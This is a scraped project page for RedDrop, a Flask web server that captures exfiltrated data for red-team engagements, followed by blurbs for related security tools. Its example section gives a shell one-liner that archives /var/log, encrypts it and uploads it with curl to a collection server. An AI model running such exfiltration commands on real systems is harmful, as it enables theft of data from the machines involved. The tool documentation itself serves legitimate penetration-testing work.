RedDrop is a quick and easy web server for capturing and processing encoded and encrypted payloads and tar archives.

Related tags

Security related resourcesinfosecpentesting-toolsredteam-tools
Overview

Red Drop

RedDrop Exfil Server

Check out the accompanying MaverisLabs Blog Post Here!

RedDrop Exfil Server is a Python Flask Web Server for Penetration Testers, Red Teamers, and Security Professionals which features:

This software is intended to be used as an a rudementary C2 endpoint for capturing web request data in various scenarios. Some examples may include:

  • A blind command injection vulnerability
  • An XSS attack where a quick and dynamic web request logging server is needed
  • A situation where remote shell access has been obtained and a verbose-logging web-based exfiltration server is desired

Demo

Demo

This project is still in development and some features may be buggy. If you run into problems, please open an Issue!

A note on security

This software should not be left generally accessible to the broader Internet. It is built with what some might consider an Arbitrary File Upload vulnerability by intention, and will accept and save files to the local disk without authentication. Due diligence should be taken to ensure that the system this software is deployed to is secured properly. A few recommendations:

  • Utilize the Authorization Rules feature of RedDrop to drop requests which do not meet your criteria.
  • Place a Reverse Proxy to route and block traffic to this web application
  • Whitelist your target's IP space
  • Don't auto extract archives without understanding my filtering method

Quick Start

Docker

mkdir uploads logs
docker run --rm -t -v "$PWD/uploads:/reddrop/uploads" -v "$PWD/logs:/reddrop/logs" -p "80:80" --name reddrop cyberbutler/reddrop -h

PipEnv

pip install --user pipenv
pipenv install
pipenv shell
python reddrop-server.py -h

Options

python reddrop-server.py -h

     A Webserver for File and Data Exfiltration.
        Author: @cyberbutler/@thecyberbutler

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -H HOST  The host IP Address to bind to (default:
                        0.0.0.0)
  --port PORT, -P PORT  The port to bind to (default: 80)
  -c CONFIG, --config CONFIG
                        YAML config file path (default: None)
  --dump-config         Dump the configuration settings as YAML
                        (default: False)
  --debug               Enable Flask's Debug Mode (default: False)
  -p {hex,openssl-aes256-pbkdf2,gzip,b64}, --processor {hex,openssl-aes256-pbkdf2,gzip,b64}
                        Specify a processor to use. This flag can
                        be used more than once to define multiple
                        process_list functions. Use this flag in
                        the order in which you wish to process
                        received data (default: [])
  -A, --auto-process, --no-auto-process
                        Automatically run processors based on
                        detected data. This option is enabled by
                        default, but should be disabled (--no-
                        auto-process) when you receive output you
                        don't expect. Such as in the case of
                        Base64 decoding being run on output that
                        is not Base64 encoded. Instead, force the
                        process with the `-p` flag. (default:
                        True)
  --auto-extract-tar, -x
                        Auto extract TAR archives received by the
                        server. (default: False)
  --encryption-password PROCESSOR_ARGUMENTS.OPENSSL-AES256-PBKDF2.PASSWORD
                        The password used to decrypt/encrypt.
                        (default: EncryptMe)
  -r AUTHORIZATION_RULES, --authorization_rules AUTHORIZATION_RULES
                        Specify an Authorization Rule to deny
                        requests which do not match the provided
                        Key and Regex value pair. Specified as
                        <Key>=<Regex>. (default: None)
  -t TAGS, --tag TAGS   Tag data received during this session in the logs as well as the directory files are uploaded to. Example:
                        -t log4j -t acme.org (default: None)
  --tls-keyfile GUNICORN.KEYFILE
                        Enables TLS Support. (Production Only) The path to a TLS key file (default: None)
  --tls-certfile GUNICORN.CERTFILE
                        Enables TLS Support. (Production Only) The path to a TLS cert file (default: None)

Far more configuration options exist which must be specified in Environment Variables, use `--dump-config` to see all of the options

Examples

Exfiltrating a Tar archive and command output from a Linux system

tar cz /var/log | base64 | xxd -ps | gzip | openssl enc -aes-256-cbc -pass 'pass:EncryptMe' -e -a -pbkdf2 | curl 172.17.0.1$PWD -F '[email protected]' -F "listing=`ls -al * | gzip | base64`"

example-screenshot.png

Todo

  • Greater documentation of techniques using this web server
  • Chunked File Upload handling and example commands
  • More Processing modules
  • Expand archive extraction functionality
Owner
Twitter: thecyberbutler
GitHub Repository
Visius Heimdall is a tool that checks for risks on your cloud infrastructure

Heimdall Cloud Checker 🇧🇷 About Visius is a Brazilian cybersecurity startup that follows the signs of the crimson thunder ;) 🎸 ! As we value open s

visius 48 Jun 20, 2022
Open Source Tool - Cybersecurity Graph Database in Neo4j

GraphKer Open Source Tool - Cybersecurity Graph Database in Neo4j |G|r|a|p|h|K|e|r| { open source tool for a cybersecurity graph database in neo4j } W

Adamantios - Marios Berzovitis 27 Dec 06, 2022
The probability of having the password you want in the PassMaker is +90%!!

PasswordMaker Strong listing password Introduction The probability of having the password you want in the tool is +90%!! How to Install Open the termi

MasterBurnt 4 Sep 05, 2021
A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence of a file

A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence o

2 Nov 09, 2022
A TCP Backdoor made in python

Tracey-Backdoor A Reverse Shell Backdoor made in python OOP. It supposed to work in Windows and Linux OS Functions: Reverse Connection Send Reverse TC

13 Oct 15, 2022
Domain abuse scanner covering domainsquatting and phishing keywords.

🦷 monodon 🐋 Domain abuse scanner covering domainsquatting and phishing keywords. Setup Monodon is a Python 3.7+ programm. To setup on a Linux machin

2 Mar 15, 2022
labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface

labsecurity labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface. Warning

Dylan Meca 16 Dec 08, 2022
NoSecerets is a python script that is designed to crack hashes extremely fast. Faster even than Hashcat

NoSecerets NoSecerets is a python script that is designed to crack hashes extremely fast. Faster even than Hashcat How does it work? Instead of taking

DosentTrust GithubDatabase 9 Jul 04, 2022
A bare-bones POC container runner in python

pybox A proof-of-concept bare-bones container written in 50 lines of python code. Provides namespace isolation and resource limit control Usage Insta

Anirudh Haritas Murali 5 Jun 03, 2021
Vuln Scanner With Python

VulnScanner Features Web Application Firewall (WAF) detection. Cross Site Scripting (XSS) tests. SQL injection time based test. SQL injection error ba

< / N u l l S 0 U L > 1 Dec 25, 2021
Confluence OGNL injection

CVE-2021-26084 Confluence OGNL injection CVE-2021-26084 is an Object-Graph Navigation Language (OGNL) injection vulnerability in the Atlassian Conflue

Ashish Kunwar 15 Sep 23, 2022
Description Basic Recon tool for beginners. Especially those who faces issue on how to recon or what all tools to use

Description Basic Recon tool for beginners. Especially those who faces issue on how to recon or what all tools to use. Will try to add atleast 10 more tools currently use 7 sources to gather domains.

Harinder Singh 7 Jan 03, 2022
VPN Overall Reconnaissance, Testing, Enumeration and eXploitation Toolkit

Vortex VPN Overall Reconnaissance, Testing, Enumeration and Exploitation Toolkit Overview A very simple Python framework, inspired by SprayingToolkit,

315 Dec 28, 2022
Python decompiler for Python 1.5-2.4 (for historical archive)

This preserves the early code of a Python decompiler for Python versions 1.5 to 2.4. I have been able to install this using pyenv using Python 2.3.7 u

R. Bernstein 2 Jan 04, 2022
A Python Tool that uses Shodan API's to perform quick recon for vulnerabilities

Shodan Quick Recon A Python Tool that uses Shodan API's to perform quick recon for vulnerabilities Configuration You must edit the python code, and in

Black Hat Ethical Hacking 5 Aug 09, 2022
This is a partial and quick and dirty proof of concept implementation of the following specifications to configure a tor client to use trusted exit relays only.

This is a partial and quick and dirty proof of concept implementation of the following specifications to configure a tor client to use trusted exit re

22 Nov 09, 2022
Dark-Fb No Login 100% safe

Dark-Fb No Login 100% safe TERMUX • pkg install python2 && git -y • pip2 install requests mechanize tqdm • git clone https://github.com/BOT-033/Sensei

Bukan Hamkel 1 Dec 04, 2021
A Feature Rich Modular Malware Configuration Extraction Utility for MalDuck

Malware Configuration Extractor A Malware Configuration Extraction Tool and Modules for MalDuck This project is FREE as in FREE 🍺 , use it commercial

c3rb3ru5 103 Dec 18, 2022
Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.

sshuttle: where transparent proxy meets VPN meets ssh As far as I know, sshuttle is the only program that solves the following common case: Your clien

9.4k Jan 04, 2023
Phishing-Crack tools to punish friends

Phishing-Crack Phishing Tool Version 1.0.0 Created By temirovazat A Phishing Tool With PHP and Python3 Features Fake Instagram Phishing Page Fake Face

3 Oct 04, 2022